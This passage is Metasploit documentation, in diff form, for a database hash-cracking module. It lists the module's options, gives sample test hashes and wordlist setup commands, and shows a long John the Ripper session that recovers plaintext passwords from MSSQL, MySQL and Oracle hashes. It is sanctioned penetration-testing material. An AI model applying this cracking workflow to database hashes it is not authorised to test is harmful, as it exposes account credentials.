+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MSSQL**
+
+   Crack MSSQL hashes. Default is `true`.
+
+   **MYSQL**
+
+   Crack MySQL hashes. Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **ORACLE**
+
+   Crack oracle hashes. Default is `true`.
+
+
+   **POSTGRES**
+
+   Crack postgres hashes. Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279$
+creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E278$
+creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+## oracle (10) uses usernames in the hashing, so we can't overide that here
+creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+## oracle 11/12 H value, username is used
+creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797$
+## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
+creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:$
+creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B3$
+##postgres uses username, so we can't overide that here
+creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+creds add user:example postgres:md5be86a79bf20fake2d58d5453c47d4860
+echo "" > /root/.msf4/john.pot
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "md5be86a79bf20fake2d58d5453c47d4860:password" >> /root/.msf4/john.pot
+echo "\$1\$O3JMY.Tw\$AdLnLjQ/5jXF9.fakegHv/:password" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+echo "toto" >> /tmp/wordlist
+echo "foo" >> /tmp/wordlist
+echo "tere" >> /tmp/wordlist
+echo "Password1\!" >> /tmp/wordlist
+echo "system" >> /tmp/wordlist
+echo "simon" >> /tmp/wordlist
+echo "A" >> /tmp/wordlist
+echo "THALES" >> /tmp/wordlist
+echo "probe" >> /tmp/wordlist
+echo "epsilon" >> /tmp/wordlist
+echo "t\!" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_databases
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-29358-125bmsb
+[*] Wordlist file written out to /tmp/jtrtmp20190531-29358-11uv1t0
+[*] Checking mssql hashes already cracked...
+[*] Cracking mssql hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:44) 50.00g/s 400.0p/s 400.0c/s 400.0C/s TEST3:::..FOO
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mssql hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=RiixU30Z --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username   Cracked Password  Method
+ -----  ---------  --------   ----------------  ------
+ 1357   mssql      mssql_foo  FOO               Single
+
+[*] Checking mssql05 hashes already cracked...
+[*] Cracking mssql05 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 15:44) 100.0g/s 400.0p/s 800.0c/s 800.0C/s test3:::..foo
+Use the "--show --format=mssql05" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mssql05 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=3FMqTSQB --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql05 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1356   mssql05    mssql05_toto  toto              Single
+ 1357   mssql      mssql_foo     FOO               Single
+
+[*] Checking mssql12 hashes already cracked...
+[*] Cracking mssql12 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:44) 50.00g/s 409600p/s 409600c/s 409600C/s test3:::..Password1\!99
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mssql12 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Hgkng17W --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mssql12 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username            Cracked Password  Method
+ -----  ---------  --------            ----------------  ------
+ 1356   mssql05    mssql05_toto        toto              Single
+ 1357   mssql      mssql_foo           FOO               Single
+ 1358   mssql12    mssql12_Password1!  Password1!        Single
+
+[*] Checking mysql hashes already cracked...
+[*] Cracking mysql hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:45) 100.0g/s 51200p/s 51200c/s 51200C/s test3:::..est3:::
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mysql hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=8zGhJlFs --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username            Cracked Password  Method
+ -----  ---------  --------            ----------------  ------
+ 1356   mssql05    mssql05_toto        toto              Single
+ 1357   mssql      mssql_foo           FOO               Single
+ 1358   mssql12    mssql12_Password1!  Password1!        Single
+ 1359   mysql      mysql_probe         probe             Single
+
+[*] Checking mysql-sha1 hashes already cracked...
+[*] Cracking mysql-sha1 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:45) 100.0g/s 1600p/s 1600c/s 1600C/s tere..probe
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mysql-sha1 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+
+[*] Checking oracle hashes already cracked...
+[*] Cracking oracle hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 15:45) 66.66g/s 364200p/s 1092Kc/s 1092KC/s TEST3:::..T1900
+Use the "--show --format=oracle" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking oracle hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
+Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
+Almost done: Processing the remaining buffered candidate passwords, if any.
+Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
+Proceeding with incremental:ASCII
+Warning: mixed-case charset, but the current hash type is case-insensitive;
+some candidate passwords may be unnecessarily tried more than once.
+0g 0:00:01:00  3/3 0g/s 2705Kp/s 2705Kc/s 2705KC/s LML489..LST0WO
+Session stopped (max run-time reached)
+[*] Cracking oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
+Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
+Almost done: Processing the remaining buffered candidate passwords, if any.
+Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
+Proceeding with incremental:ASCII
+Warning: mixed-case charset, but the current hash type is case-insensitive;
+some candidate passwords may be unnecessarily tried more than once.
+0g 0:00:01:00  3/3 0g/s 2700Kp/s 2700Kc/s 2700KC/s CKS5ER..CGE0DW
+Session stopped (max run-time reached)
+[*] Cracking oracle hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:01:00  0g/s 2880Kp/s 2880Kc/s 2880KC/s 225486472..229896168
+Session stopped (max run-time reached)
+[*] Cracking oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-05-31 15:48) 0g/s 16700p/s 16700c/s 16700C/s TEST3:::..HASHCATING
+Session completed
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+
+[*] Checking dynamic_1506 hashes already cracked...
+[*] Cracking dynamic_1506 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+
+[*] Checking raw-sha1,oracle hashes already cracked...
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+
+[*] Checking oracle11 hashes already cracked...
+[*] Cracking oracle11 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:48) 100.0g/s 2400p/s 2400c/s 2400C/s epsilon..Buddahh
+Warning: passwords printed above might not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking oracle11 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+ 1363   oracle11    DEMO                epsilon           Single
+ 1364   oracle11    oracle11_epsilon    epsilon           Single
+
+[*] Checking oracle12c hashes already cracked...
+[*] Cracking oracle12c hashes in single mode...
